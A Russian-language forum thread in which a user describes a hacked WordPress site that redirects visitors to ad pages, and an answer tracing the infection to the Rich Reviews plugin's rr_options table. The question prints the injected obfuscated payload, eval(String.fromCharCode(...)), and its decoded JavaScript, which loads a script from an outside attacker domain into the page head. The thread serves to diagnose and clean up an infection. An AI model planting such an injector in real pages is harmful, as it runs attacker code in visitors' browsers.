Как вернуть взломанный WordPress сайт - PullRequest
0 голосов
/ 01 октября 2019

Таким образом, в основном сайт моего клиента взломан, и каждый раз, когда я открываю, он перенаправляет на другие сайты (в основном объявления).

Его поведение. Каждый раз, когда я запускаю веб-сайт, он автоматически меняет домашний URL и URL сайта.

Я пытался изменить домашний URL и URL сайта в cpanel, но снова запускаю сайтэто перенаправляет. и после этого он также автоматически изменился на этот адрес в cpanel.

enter image description here

Я могу получить доступ к внутреннему интерфейсу после изменения URL-адреса в cpanel до запуска внешнего интерфейса. Я запускаю сканирование с помощью плагина Sucuri, который выдает следующее сообщение об ошибке:

11: 1569826918_2:"Error: admin, 122.160.112.18; General settings changed: (multiple entries): siteurl: from 'https:\/\/foo.com' to 'https:\/\/bes.belaterbewasthere.com\/reserv\/\/t3.js?',home: from 'https:\/\/foo.com' to 'https:\/\/bes.belaterbewasthere.com\/reserv\/\/a3.js?'"

Адрес сайта изменен по соображениям конфиденциальности. URL перенаправления есть.

Я проверяю все возможные файлы, но не могу найти подозрительный код. Может кто-нибудь, пожалуйста, помогите мне.

Редактировать: После нескольких часов исследований я выяснил, что это введено из зашифрованного кода ниже, eval(String.fromCharCode(32,40,102,117,110,99,116,105,111,110,40,41,32,123,10,32,32,32,32,118,97,114,32,101,108,101,109,32,61,32,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,9,101,108,101,109,46,116,121,112,101,32,61,32,39,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,39,59,32,10,32,32,32,32,101,108,101,109,46,115,114,99,32,61,32,39,104,116,116,112,115,58,47,47,98,101,115,46,98,101,108,97,116,101,114,98,101,119,97,115,116,104,101,114,101,46,99,111,109,47,99,111,114,110,47,102,108,101,120,46,106,115,63,116,112,61,55,57,57,39,59,10,32,32,32,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,34,104,101,97,100,34,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,101,108,101,109,41,59,10,32,32,125,41,40,41,59));

Когда я расшифровал этот код (с этого сайта *)1026 *), я понял,

eval( (function() { var elem = document.createElement('script'); elem.type = 'text/javascript'; elem.src = 'https://bes.belaterbewasthere.com/corn/flex.js?tp=799'; document.getElementsByTagName("head")[0].appendChild(elem); })();); Да! это URL https://bes.belaterbewasthere.com, перенаправленный и выбрасывающий объявление.

1 Ответ

1 голос
/ 03 октября 2019

У меня была та же проблема два дня назад, и я исправил свою проблему, переписав полную базу данных на две недели, когда код еще не был там. Код был в таблице, используемой Rich Reviews, где он был введен. Этот плагин известен этой проблемой и из-за этого удаляется из Wordpress. После удаления плагина я также связался с Google AdWords, и они проверили, все ли в порядке, и это было, и они перезапустили кампанию AdWords.

Если у вас нет резервной копии, вы можетепопробуйте просто удалить плагин (возможно, это также Rich Reviews), связанный с таблицей, в которой находится код), чтобы решить проблему. Таблица с этой проблемой была rr_options.

...